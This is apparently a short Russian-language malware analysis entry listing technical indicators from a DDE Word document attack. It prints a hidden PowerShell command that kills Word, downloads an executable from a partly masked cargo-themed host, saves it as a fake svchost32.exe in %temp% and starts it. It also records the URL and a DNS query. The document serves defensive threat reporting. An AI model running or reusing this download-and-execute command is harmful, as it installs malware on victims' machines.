Техническая информация
- http://fa###cargo.com/images/file/dde/4.exe как %temp%\svchost32.exe
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe&powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fa###cargo.com/images/file/dde/4.exe','%temp%\svchost32.exe');Start-Process '%temp%\sv...
- http://fa###cargo.com/images/file/dde/4.exe
- DNS ASK fa###cargo.com
- ClassName: '' WindowName: ''